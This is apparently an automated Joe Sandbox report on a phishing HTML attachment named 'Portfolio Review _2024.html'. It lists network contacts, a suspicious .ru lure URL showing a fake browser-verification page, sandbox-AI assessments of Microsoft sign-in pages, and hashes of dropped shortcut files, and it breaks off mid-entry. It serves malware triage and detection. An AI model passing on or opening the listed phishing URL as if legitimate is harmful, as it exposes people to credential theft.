                                                          188.114.97.3
                                                          ky.gurativez.ruEuropean Union
                                                          13335CLOUDFLARENETUStrue
                                                          172.217.18.106
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          20.190.159.0
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          188.114.96.3
                                                          unknownEuropean Union
                                                          13335CLOUDFLARENETUSfalse
                                                          152.199.21.175
                                                          sni1gl.wpc.alphacdn.netUnited States
                                                          15133EDGECASTUSfalse
                                                          142.250.186.142
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          64.233.184.84
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.17.25.14
                                                          cdnjs.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          2.19.97.184
                                                          unknownEuropean Union
                                                          20940AKAMAI-ASN1EUfalse
                                                          40.126.32.138
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          IP
                                                          192.168.2.16
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1557972
                                                          Start date and time:2024-11-18 19:48:54 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:13
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • EGA enabled
                                                          Analysis Mode:stream
                                                          Analysis stop reason:Timeout
                                                          Sample name:Portfolio Review _2024.html
                                                          Detection:MAL
                                                          Classification:mal60.phis.evad.winHTML@22/6@66/338
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .html
                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 142.250.181.227, 142.250.185.110, 64.233.184.84, 34.104.35.123
                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • VT rate limit hit for: Portfolio Review _2024.html
                                                          InputOutput
                                                          URL: :// Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": false,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: ://
                                                          URL: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]] Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Conducting verification on your browser to ensure safety.",
                                                            "prominent_button_name": "unknown",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: http://ky.gurativez.ru Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": true,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": false,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": true
                                                          }
                                                          URL: http://ky.gurativez.ru
                                                          URL: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]] Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Conducting verification on your browser to ensure safety.",
                                                            "prominent_button_name": "unknown",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]] Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": []
                                                          }
                                                          ```
                                                          
                                                          The provided image does not contain any visible brands or logos. The image only shows a message stating "Conducting verification on your browser to ensure safety." There are no brand names or logos visible in the header, footer, or any other part of the page.
                                                          URL: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]] Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Cloudflare"
                                                            ]
                                                          }
                                                          URL: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]] Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Conducting verification on your browser to ensure safety.",
                                                            "prominent_button_name": "unknown",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]] Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Cloudflare"
                                                            ]
                                                          }
                                                          URL: https://www.office.com/ Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Welcome to Microsoft 365",
                                                            "prominent_button_name": "Sign in",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://www.office.com Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: https://www.office.com
                                                          URL: https://www.office.com/ Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft",
                                                              "Microsoft 365"
                                                            ]
                                                          }
                                                          URL: https://www.office.com/ Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": false,
                                                            "trigger_text": "unknown",
                                                            "prominent_button_name": "Sign in",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://www.office.com/ Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft",
                                                              "Microsoft 365"
                                                            ]
                                                          }
                                                          URL: https://login.microsoftonline.com Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: https://login.microsoftonline.com
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Trying to sign you in",
                                                            "prominent_button_name": "Cancel",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": []
                                                          }
                                                          ```
                                                          
                                                          The provided image does not contain any visible brand logos or identifiable brands. The image shows a simple login screen with the text "Trying to sign you in" and a "Cancel" button, but no brand names or logos are present.
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Sign in",
                                                            "prominent_button_name": "Next",
                                                            "text_input_field_labels": [
                                                              "billig@microsoft.com"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Taking you to your organization's sign-in page",
                                                            "prominent_button_name": "Cancel",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Sign in with PIN or smartcard",
                                                            "prominent_button_name": "Sign in with PIN or smartcard",
                                                            "text_input_field_labels": [
                                                              "Password"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://msft.sts.microsoft.com Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: https://msft.sts.microsoft.com
                                                          URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The URL 'msft.sts.microsoft.com' is a subdomain of 'microsoft.com', which is the legitimate domain for Microsoft.",    "The use of 'msft' and 'sts' as subdomains is consistent with Microsoft's naming conventions for services and authentication.",    "No suspicious elements such as misspellings or unusual domain extensions are present in the URL."  ],  "riskscore": 1}
                                                          URL: msft.sts.microsoft.com
                                                                      Brands: Microsoft
                                                                      Input Fields: Password
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "bill@microsoft.com",
                                                            "prominent_button_name": "Sign in",
                                                            "text_input_field_labels": [
                                                              "Password"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Incorrect user ID or password. Type the correct user ID and password, and try again.",
                                                            "prominent_button_name": "Sign in with PIN or smartcard",
                                                            "text_input_field_labels": [
                                                              "Password"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Incorrect user ID or password. Type the correct user ID and password, and try again.",
                                                            "prominent_button_name": "Sign in",
                                                            "text_input_field_labels": [
                                                              "bill@microsoft.com",
                                                              "....."
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The URL 'msft.sts.microsoft.com' is a subdomain of 'microsoft.com', which is the legitimate domain for Microsoft.",    "The use of 'msft' is a common abbreviation for Microsoft and is not suspicious in this context.",    "The domain structure does not contain any suspicious elements such as misspellings or unusual domain extensions.",    "The input field uses a Microsoft email address, which aligns with the brand and domain."  ],  "riskscore": 1}
                                                          URL: msft.sts.microsoft.com
                                                                      Brands: Microsoft
                                                                      Input Fields: bill@microsoft.com, .....
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The URL 'msft.sts.microsoft.com' is a subdomain of 'microsoft.com', which is the legitimate domain for Microsoft.",    "The use of 'sts' in the subdomain is common for security token services, which is consistent with Microsoft's services.",    "No suspicious elements such as misspellings or unusual domain extensions are present in the URL."  ],  "riskscore": 1}
                                                          URL: msft.sts.microsoft.com
                                                                      Brands: Microsoft
                                                                      Input Fields: Password
                                                          URL: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48 Model: Joe Sandbox AI
                                                          ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The URL 'msft.sts.microsoft.com' is a subdomain of 'microsoft.com', which is the legitimate domain for Microsoft.",    "The use of 'sts' in the subdomain is common for security token services, which is consistent with Microsoft's services.",    "No suspicious elements such as misspellings or unusual domain extensions are present in the URL."  ],  "riskscore": 1}
                                                          URL: msft.sts.microsoft.com
                                                                      Brands: Microsoft
                                                                      Input Fields: Password
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 17:49:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2673
                                                          Entropy (8bit):3.9800041368158277
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:650E9D5EECAD5E70F7E777C9EB876DBC
                                                          SHA1:93A9C358EBACE6D9AA8C3834BF471F97CB4B5E65
                                                          SHA-256:767635FB78DFDDD84F48C2B6B1C1C8BD59A7D97E0E9DFA72BFBEAD73898A0B50
                                                          SHA-512:0492DE564D83E4F9736339166F3ED37CEDF0142C491C8E7ACAD86D6242F80FC8957BCDF236D832B0CC1E077A7E5097229B39DDE781BCDAF758AEDCF125FB24FA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,....8...9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY$.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY,.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY,.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY,............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T,.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 17:49:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2675
                                                          Entropy (8bit):3.9983427773297398
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:C26D773614CDEC55E059AFB87507AB0D
                                                          SHA1:1769FC5E8F2ACAF36EE5D318C9E8798576E45482
                                                          SHA-256:139FC678D57650AEDF92283FF4CEDB1EEE896B700C7DD201466B6C4CA724D0DB
                                                          SHA-512:EA8051E4B61C307016ED2DED5AB9A28447D35140161F2C1AC26B455B254F1B2CF13057F80922E3293E2BEA113ACFD381C9BF2373DDE4C383DE290C1F2EFB256B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.........9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY$.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY,.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY,.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY,............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T,.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2689
                                                          Entropy (8bit):4.005321503018393
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D0ED95E18050BADADE8E74E5259252D8
                                                          SHA1:1059F213258BEC67748C4F6631A9B7CB6908F827
                                                          SHA-256:383F672FADF03CB5A405C1AAAD6C7374662D79EF3BF97F6D73B158E16E209B66
                                                          SHA-512:6A538A4277E4E3887D45DE9680E1AB8568B6FE021DB7B8BBB5C37F96E787A76792EEC5E006687F3CD9F90B2A5968D2FEFBE8D7FCE760CBA78FBBD2B3578227A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY$.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY,.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY,.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY,............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T,.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 17:49:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2677
                                                          Entropy (8bit):3.994613288420585
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D1CB45E760A1DA6B7B2894CC341589DD
                                                          SHA1:1DF512659AC94A5C54EAD9BC57BA30C8329930AC
                                                          SHA-256:3ADD90411EC0C9A68B6F63B385CB21E315721F1C72023A98FE43C7693018410C
                                                          SHA-512:FDDF75701FFDBCC1962677FEA662576526E4F74A752760408E7636CE3E5B2FCB2255209A43DA75320FA0CB3C5294BC4DD069DC0211405632B3447D107DCCB49A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.........9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY$.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY,.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY,.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY,............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T,.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 17:49:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2677
                                                          Entropy (8bit):3.9823066169971484
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:588B99BAB4ED470E4CC54DD59EB6B470
